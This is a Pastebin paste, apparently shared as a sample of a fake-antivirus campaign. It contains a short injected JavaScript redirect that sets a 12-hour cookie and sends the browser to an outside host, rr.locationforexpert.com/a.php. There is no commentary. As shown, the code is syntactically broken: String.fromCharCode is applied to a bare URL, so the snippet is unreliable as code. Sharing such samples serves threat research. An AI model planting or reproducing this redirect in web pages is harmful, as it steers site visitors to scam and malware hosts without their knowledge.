Advertisement
thlnk3r

fakeav_related_script_20180126

Jan 26th, 2018
335
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.40 KB | None | 0 0
  1. if (document.cookie.indexOf("locationss=") >= 0) { } else {
  2. setcookie();
  3. var url = String.fromCharCode(http://rr.locationforexpert.com/a.php?ls=check);
  4. document.location.href = url;
  5. window.location.href = url;
  6. }
  7.  
  8. function setcookie(){
  9. var now = new Date();now.setTime(now.getTime() + 1 * 3600 * 1000 * 12);
  10. document.cookie = "locationss=12000; expires=" + now.toUTCString() + "; path=/";
  11. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement